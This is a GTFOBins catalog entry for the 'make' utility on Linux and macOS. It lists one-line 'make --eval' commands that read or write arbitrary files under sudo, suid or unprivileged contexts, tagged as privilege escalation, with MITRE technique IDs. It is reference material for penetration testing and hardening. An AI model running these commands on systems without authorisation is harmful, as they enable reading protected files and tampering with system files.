Catalog GTFOBins

GTFO · Tool

make

9 techniques Linux · macOSGTFOBins GPL-3.0

file-read

File ReadPrivilege Escalation LinuxmacOS
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .
Context
sudo
Native
file-read
MITRE
T1005

file-read

File ReadPrivilege Escalation LinuxmacOS
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .
Context
suid
Native
file-read
MITRE
T1005

file-read

File Read LinuxmacOS
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .
Context
unprivileged
Native
file-read
MITRE
T1005

file-write

File WritePrivilege Escalation LinuxmacOS
make -s --eval='$(file >/path/to/output-file,DATA)' .
Context
sudo
Native
file-write
MITRE
T1565

file-write

File WritePrivilege Escalation LinuxmacOS
make -s --eval='$(file >/path/to/output-file,DATA)' .
Context
suid
Native
file-write
MITRE
T1565